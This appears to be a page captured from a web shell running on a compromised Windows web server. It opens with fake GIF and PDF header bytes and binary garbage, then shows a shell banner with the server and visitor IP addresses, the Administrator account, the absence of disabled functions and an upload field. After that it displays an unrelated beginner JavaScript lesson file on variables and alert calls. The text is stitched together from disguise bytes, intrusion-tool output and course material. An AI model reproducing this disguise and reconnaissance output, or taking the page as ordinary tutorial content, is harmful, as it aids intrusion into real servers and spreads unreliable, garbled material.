GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1022/Resources/Week/04/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <title>Hello world</title> <meta charset="utf-8"> </head> <p id="para1">Before the script...</p> <script> "use strict"; /** /alert( 'Hello, world!' );/**/ /** /alert( 'Hello, again!' );/**/ // alert('For the third time.'); /** / let message; message = 'Hello, world!'; /** / let message = 'Hello, world!'; alert(message); /**/ /**/ var message; let ooga = message = 'Hello, world!'; // Both ooga and message are string primitives and get the same value. var message = 'Not so much.'; // You can var the same variable on another line, but not let. alert(message); let my_variable = 'some string' let another$variable = 5; let имя = '...'; let 我 = '...'; // alert(我); // num = 5; // Causes error under use strict. /**/ </script> <p>...After the script.</p> </body> </html>